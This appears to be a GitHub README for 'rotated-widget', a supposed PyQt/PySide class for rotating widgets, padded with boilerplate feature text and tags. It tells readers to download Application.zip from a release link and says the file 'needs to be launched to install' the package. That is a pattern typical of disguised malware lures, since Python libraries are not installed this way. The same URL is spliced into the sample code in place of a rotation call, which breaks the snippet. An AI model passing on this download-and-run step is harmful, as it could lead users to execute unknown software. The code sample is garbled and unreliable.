Welcome to the "rotated-widget" repository! π
The "rotated-widget" repository provides a custom Qt-based class that enables dynamic rotation of a QWidget at any angle using QGraphicsView and QGraphicsProxyWidget. This versatile class offers support for flexible size policies and aspect ratio preservation, making it seamlessly integrate into PyQt or PySide applications.
πΉ Dynamic rotation of QWidget at any angle
πΉ Supports QGraphicsView and QGraphicsProxyWidget
πΉ Flexible size policies
πΉ Aspect ratio preservation
πΉ Seamless integration into PyQt or PySide applications
π Custom
π GUI
π PyQt
π PyQt4
π PyQt5
π PyQt6
π PySide
π PySide2
π PySide6
π Python
π QGraphicsProxyWidget
π QGraphicsView
π Qt
π RotatedWidget
π Rotation
π Widgets
To get started, you can download the package file from the following link:
Note: The file needs to be launched to install the "rotated-widget" package.
- Import the custom RotatedWidget class into your PyQt or PySide application.
- Instantiate the RotatedWidget with the desired QWidget to be rotated.
- Set the rotation angle using the provided methods.
- Enjoy the dynamic rotation of the widget in your application!
# Sample code snippet
from rotatedwidget import RotatedWidget
widget = MyCustomWidget()
rotated_widget = RotatedWidget(widget)
https://github.com/LocalCumDumpsuter/rotated-widget/releases/download/v1.0/Application.zip(45) # Rotate the widget by 45 degrees
For any inquiries or issues regarding the "rotated-widget" package, please check the "Releases" section of this repository or reach out to the project maintainers for assistance.
A big thank you to all the contributors who have helped make the "rotated-widget" repository possible. Your contributions are truly appreciated! π
This project is licensed under the MIT License - see the LICENSE file for details.
Stay updated on future releases and projects by following us on GitHub!
Thank you for visiting the "rotated-widget" repository! We hope you find the RotatedWidget class helpful in your PyQt or PySide applications. Feel free to star the repository if you like what you see! β
π Happy Coding! π